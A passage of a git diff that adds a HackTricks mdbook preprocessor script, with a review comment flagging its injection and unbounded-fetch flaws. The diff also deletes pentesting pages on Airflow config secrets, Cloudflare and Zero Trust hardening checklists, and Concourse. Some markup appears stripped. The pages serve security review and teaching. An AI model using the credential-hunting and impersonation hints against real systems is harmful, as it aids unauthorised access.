+command = "python3 ./hacktricks-preprocessor.py"
+
+[output.html]
+additional-css = ["theme/pagetoc.css", "theme/tabs.css"]
+additional-js = [
+ "theme/pagetoc.js",
+ "theme/tabs.js",
+ "theme/ht_searcher.js",
+ "theme/sponsor.js",
+]
+no-section-label = true
+preferred-dark-theme = "hacktricks-dark"
+default-theme = "hacktricks-light"
+
+[output.html.fold]
+enable = true # whether or not to enable section folding
+level = 0 # the depth to start folding
+
+
+[output.html.print]
+enable = false # whether or not to enable print
diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py
new file mode 100644
index 000000000..56a0cf0dc
--- /dev/null
+++ b/hacktricks-preprocessor.py
@@ -0,0 +1,106 @@
+import json
+import sys
+import re
+import logging
+from os import path
+from urllib.request import urlopen, Request
+
+logger = logging.getLogger(__name__)
+logging.basicConfig(filename='hacktricks-preprocessor.log', filemode='w', encoding='utf-8', level=logging.DEBUG)
+
+
+def findtitle(search ,obj, key, path=(),):
+ # logger.debug(f"Looking for {search} in {path}")
+ if isinstance(obj, dict) and key in obj and obj[key] == search:
+ return obj, path
+ if isinstance(obj, list):
+ for k, v in enumerate(obj):
+ item = findtitle(search, v, key, (*path, k))
+ if item is not None:
+ return item
+ if isinstance(obj, dict):
+ for k, v in obj.items():
+ item = findtitle(search, v, key, (*path, k))
+ if item is not None:
+ return item
+
+
+def ref(matchobj):
+ logger.debug(f'Match: {matchobj.groups(0)[0].strip()}')
+ href = matchobj.groups(0)[0].strip()
+ title = href
+ if href.startswith("http://") or href.startswith("https://"):
+ # pass
+ try:
+ raw_html = str(urlopen(Request(href, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'})).read())
+ match = re.search('(.*?)', raw_html)
+ title = match.group(1) if match else href
+ except Exception as e:
+ logger.debug(f'Error opening URL {href}: {e}')
+ pass #nDont stop on broken link
+ else:
+ try:
+ if href.endswith("/"):
+ href = href+"README.md" # Fix if ref points to a folder
+ chapter, _path = findtitle(href, book, "source_path")
+ logger.debug(f'Recursive title search result: {chapter['name']}')
+ title = chapter['name']
+ except Exception as e:
+ try:
+ dir = path.dirname(current_chapter['source_path'])
+ logger.debug(f'Error getting chapter title: {href} trying with relative path {path.normpath(path.join(dir,href))}')
+ chapter, _path = findtitle(path.normpath(path.join(dir,href)), book, "source_path")
+ logger.debug(f'Recursive title search result: {chapter['name']}')
+ title = chapter['name']
+ except Exception as e:
+ logger.debug(f'Error 
getting chapter title: {path.normpath(path.join(dir,href))}')
+ print(f'Error getting chapter title: {path.normpath(path.join(dir,href))}')
+ sys.exit(1)
+
+
+ template = f"""{title}"""
+
+ # translate_table = str.maketrans({"\"":"\\\"","\n":"\\n"})
+ # translated_text = template.translate(translate_table)
+ result = template
+
+ return result
+
+
+def iterate_chapters(sections):
+ if isinstance(sections, dict) and "PartTitle" in sections: # Not a chapter section
+ return
+ elif isinstance(sections, dict) and "Chapter" in sections: # Is a chapter return it and look into sub items
+ # logger.debug(f"Chapter {sections['Chapter']}")
+ yield sections['Chapter']
+ yield from iterate_chapters(sections['Chapter']["sub_items"])
+ elif isinstance(sections, list): # Iterate through list when in sections and in sub_items
+ for k, v in enumerate(sections):
+ yield from iterate_chapters(v)
+
+
+if __name__ == '__main__':
+ global context, book, current_chapter
+ if len(sys.argv) > 1: # we check if we received any argument
+ if sys.argv[1] == "supports":
+ # then we are good to return an exit status code of 0, since the other argument will just be the renderer's name
+ sys.exit(0)
+ logger.debug('Started hacktricks preprocessor')
+ # load both the context and the book representations from stdin
+ context, book = json.load(sys.stdin)
+
+ logger.debug(f"Context: {context}")
+
+
+ for chapter in iterate_chapters(book['sections']):
+ logger.debug(f"Chapter: {chapter['path']}")
+ current_chapter = chapter
+ regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endref[\s]*}}'
+ new_content = re.sub(regex, ref, chapter['content'])
+ chapter['content'] = new_content
+
+ content = json.dumps(book)
+ logger.debug(content)
+
+
+ print(content)
\ No newline at end of file
diff --git a/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
deleted file mode 100644
index 2508f970f..000000000
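Review bot: In `ref()`, the title text scraped from a remote page is interpolated straight into the output template (`template = f"""{title}"""`; the surrounding anchor tag appears to have been lost in this rendering) without any escaping, so a third-party site that a `{{#ref}}` points at can inject markup into the generated book — pass it through `html.escape(title)` (and `import html`). The fetch also runs at build time against whatever URL a contributor wrote in the markdown, with no timeout, so one unreachable host stalls the whole mdbook build and the build host can be made to request arbitrary addresses; at minimum use `urlopen(Request(href, headers={...}), timeout=10)`. `str(urlopen(...).read())` yields the `b'...'` repr rather than decoded text, so the regex runs over escaped bytes — use `.read().decode('utf-8', errors='replace')`. As rendered here the title pattern is `re.search('(.*?)', raw_html)`, which matches the empty string; if the `<title>` tags were not merely stripped by extraction, that lookup never returns a real title. The f-strings that nest the same quote character (`f'...{chapter['name']}'`) only parse on Python 3.12+, which is worth stating next to the bare `python3` command in book.toml.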
--- a/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md +++ /dev/null @@ -1,137 +0,0 @@ -# Airflow Configuration - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Configuration File - -**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** - -**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** - -Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. - -If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ -If you have **access to some machine inside the airflow env**, check the **environment**. - -Some interesting values to check when reading the config file: - -### \[api] - -* **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** -* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** -* **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** -* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: - * `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API - * `airflow.api.auth.backend.default`: **Everyone can** access it without authentication - * `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** - * `airflow.api.auth.backend.basic_auth`: For **basic authentication** - * `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). 
- * `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). - * You can also **create you own authentication** method with python. -* **`google_key_path`:** Path to the **GCP service account key** - -### **\[atlas]** - -* **`password`**: Atlas password -* **`username`**: Atlas username - -### \[celery] - -* **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) -* **`result_backend`**: Postgres url which may contain **credentials**. -* **`ssl_cacert`**: Path to the cacert -* **`ssl_cert`**: Path to the cert -* **`ssl_key`**: Path to the key - -### \[core] - -* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. -* **`fernet_key`**: Key to store encrypted variables (symmetric) -* **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. -* **`security`**: What security module to use (for example kerberos) - -### \[dask] - -* **`tls_ca`**: Path to ca -* **`tls_cert`**: Part to the cert -* **`tls_key`**: Part to the tls key - -### \[kerberos] - -* **`ccache`**: Path to ccache file -* **`forwardable`**: Enabled by default - -### \[logging] - -* **`google_key_path`**: Path to GCP JSON creds. - -### \[secrets] - -* **`backend`**: Full class name of secrets backend to enable -* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. 
- -### \[smtp] - -* **`smtp_password`**: SMTP password -* **`smtp_user`**: SMTP user - -### \[webserver] - -* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value -* **`cookie_secure`**: Set **secure flag** on the the session cookie -* **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console** -* **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) -* **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) -* **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** -* **`web_server_ssl_key`**: **Path** to the **SSL** **Key** -* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible - -### Web Authentication - -By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as - -```bash -AUTH_TYPE = AUTH_DB -``` - -Which means that the **authentication is checked against the database**. However, other configurations are possible like - -```bash -AUTH_TYPE = AUTH_OAUTH -``` - -To leave the **authentication to third party services**. - -However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**: - -```bash -AUTH_ROLE_PUBLIC = 'Admin' -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/README.md b/pentesting-ci-cd/cloudflare-security/README.md deleted file mode 100644 index 05741968d..000000000 --- a/pentesting-ci-cd/cloudflare-security/README.md +++ /dev/null @@ -1,163 +0,0 @@ -# Cloudflare Security - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** - -
- -## Websites - -Review each with: - -{% content-ref url="cloudflare-domains.md" %} -[cloudflare-domains.md](cloudflare-domains.md) -{% endcontent-ref %} - -### Domain Registration - -* [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain. - -Review each with: - -{% content-ref url="cloudflare-domains.md" %} -[cloudflare-domains.md](cloudflare-domains.md) -{% endcontent-ref %} - -## Analytics - -_I couldn't find anything to check for a config security review._ - -## Pages - -On each Cloudflare's page: - -* [ ] Check for **sensitive information** in the **`Build log`**. -* [ ] Check for **sensitive information** in the **Github repository** assigned to the pages. -* [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/). -* [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any). -* [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code** -* [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**. -* [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page. - -## **Workers** - -On each Cloudflare's worker check: - -* [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker? 
-* [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information** -* [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input) - * Check for SSRFs returning the indicated page that you can control - * Check XSSs executing JS inside a svg image - * It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input. - -{% hint style="warning" %} -Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it. -{% endhint %} - -## R2 - -On each R2 bucket check: - -* [ ] Configure **CORS Policy**. - -## Stream - -TODO - -## Images - -TODO - -## Security Center - -* [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise. - * [ ] Just **check this information** for security misconfigurations and interesting info - -## Turnstile - -TODO - -## **Zero Trust** - -{% content-ref url="cloudflare-zero-trust-network.md" %} -[cloudflare-zero-trust-network.md](cloudflare-zero-trust-network.md) -{% endcontent-ref %} - -## Bulk Redirects - -{% hint style="info" %} -Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior. 
-{% endhint %} - -* [ ] Check that the **expressions** and **requirements** for redirects **make sense**. -* [ ] Check also for **sensitive hidden endpoints** that you contain interesting info. - -## Notifications - -* [ ] Check the **notifications.** These notifications are recommended for security: - * `Usage Based Billing` - * `HTTP DDoS Attack Alert` - * `Layer 3/4 DDoS Attack Alert` - * `Advanced HTTP DDoS Attack Alert` - * `Advanced Layer 3/4 DDoS Attack Alert` - * `Flow-based Monitoring: Volumetric Attack` - * `Route Leak Detection Alert` - * `Access mTLS Certificate Expiration Alert` - * `SSL for SaaS Custom Hostnames Alert` - * `Universal SSL Alert` - * `Script Monitor New Code Change Detection Alert` - * `Script Monitor New Domain Alert` - * `Script Monitor New Malicious Domain Alert` - * `Script Monitor New Malicious Script Alert` - * `Script Monitor New Malicious URL Alert` - * `Script Monitor New Scripts Alert` - * `Script Monitor New Script Exceeds Max URL Length Alert` - * `Advanced Security Events Alert` - * `Security Events Alert` -* [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS** - * [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous** - -## Manage Account - -* [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**. -* [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**. -* [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. 
But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle. - * Therefore, whenever possible is **recommended** to use the **Enterprise plan**. -* [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled. - -{% hint style="info" %} -Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members) -{% endhint %} - -## DDoS Investigation - -[Check this part](cloudflare-domains.md#cloudflare-ddos-protection). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md deleted file mode 100644 index 7eb00f0ba..000000000 --- a/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md +++ /dev/null @@ -1,159 +0,0 @@ -# Cloudflare Domains - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** - -
- -### Overview - -* [ ] Get a feeling of **how much** are the services of the account **used** -* [ ] Find also the **zone ID** and the **account ID** - -### Analytics - -* [ ] In **`Security`** check if there is any **Rate limiting** - -### DNS - -* [ ] Check **interesting** (sensitive?) data in DNS **records** -* [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com) -* [ ] Check for web pages that **aren't** **proxied** -* [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address -* [ ] Check that **DNSSEC** is **enabled** -* [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs** - * This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings -* [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) - -### **Email** - -TODO - -### Spectrum - -TODO - -### SSL/TLS - -#### **Overview** - -* [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point. -* [ ] The **SSL/TLS Recommender** should be enabled - -#### Edge Certificates - -* [ ] **Always Use HTTPS** should be **enabled** -* [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled** -* [ ] **Minimum TLS Version should be 1.2** -* [ ] **TLS 1.3 should be enabled** -* [ ] **Automatic HTTPS Rewrites** should be **enabled** -* [ ] **Certificate Transparency Monitoring** should be **enabled** - -### **Security** - -* [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses. - * The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used. 
-* [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used -* [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare -* [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections** -* [ ] In the **`Settings`** section: - * [ ] Check that the **`Security Level`** is **medium** or greater - * [ ] Check that the **`Challenge Passage`** is 1 hour at max - * [ ] Check that the **`Browser Integrity Check`** is **enabled** - * [ ] Check that the **`Privacy Pass Support`** is **enabled** - -#### **CloudFlare DDoS Protection** - -* If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access. -* In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie. - * If the attack is from a **verified bot**, at least **add a rate limit** to bots. - * If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path. - * You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF. - * Check if **Managed rules** could also help to prevent vulnerability exploitations. - * In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.** -* In DDoS you could **override some rules to make them more restrictive**. -* **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**. 
-* In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled -* In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events** - -### Access - -{% content-ref url="cloudflare-zero-trust-network.md" %} -[cloudflare-zero-trust-network.md](cloudflare-zero-trust-network.md) -{% endcontent-ref %} - -### Speed - -_I couldn't find any option related to security_ - -### Caching - -* [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool** - -### **Workers Routes** - -_You should have already checked_ [_cloudflare workers_](./#workers) - -### Rules - -TODO - -### Network - -* [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled** -* [ ] **`HTTP/3 (with QUIC)`** should be **enabled** -* [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled** - -### **Traffic** - -TODO - -### Custom Pages - -* [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode) - -### Apps - -TODO - -### Scrape Shield - -* [ ] Check **Email Address Obfuscation** is **enabled** -* [ ] Check **Server-side Excludes** is **enabled** - -### **Zaraz** - -TODO - -### **Web3** - -TODO - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md deleted file mode 100644 index 85b037522..000000000 --- a/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md +++ /dev/null @@ -1,87 +0,0 @@ -# Cloudflare Zero Trust Network - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** - -
- -### Analytics - -* [ ] Useful to **get to know the environment** - -### **Gateway** - -* [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications. - * If used, **policies** could be created to **restrict** the access to malicious sites. - * This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies. - -### Access - -#### Applications - -On each application: - -* [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access. - * To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also) -* [ ] Check the **available identity providers** and make sure they **aren't too open** -* [ ] In **`Settings`**: - * [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything) - * [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP. - * [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** - -#### **Access Groups** - -* [ ] Check that the access groups generated are **correctly restricted** to the users they should allow. -* [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**. - * Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary. 
- -#### Service Auth - -* [ ] Check that all service tokens **expires in 1 year or less** - -#### Tunnels - -TODO - -### My Team - -TODO - -### Logs - -* [ ] You could search for **unexpected actions** from users - -### Settings - -* [ ] Check the **plan type** -* [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address** -* [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/concourse-security/README.md b/pentesting-ci-cd/concourse-security/README.md deleted file mode 100644 index bc438e1de..000000000 --- a/pentesting-ci-cd/concourse-security/README.md +++ /dev/null @@ -1,59 +0,0 @@ -# Concourse Security - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...) - -## Concourse Architecture - -Learn how the concourse environment is structured in: - -{% content-ref url="concourse-architecture.md" %} -[concourse-architecture.md](concourse-architecture.md) -{% endcontent-ref %} - -## Concourse Lab - -Learn how you can run a concourse environment locally to do your own tests in: - -{% content-ref url="concourse-lab-creation.md" %} -[concourse-lab-creation.md](concourse-lab-creation.md) -{% endcontent-ref %} - -## Enumerate & Attack Concourse - -Learn how you can enumerate the concourse environment and abuse it in: - -{% content-ref url="concourse-enumeration-and-attacks.md" %} -[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-ci-cd/concourse-security/concourse-architecture.md b/pentesting-ci-cd/concourse-security/concourse-architecture.md
deleted file mode 100644
index c2a08a80f..000000000
--- a/pentesting-ci-cd/concourse-security/concourse-architecture.md
+++ /dev/null
@@ -1,64 +0,0 @@
-# Concourse Architecture
-
-## Concourse Architecture
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
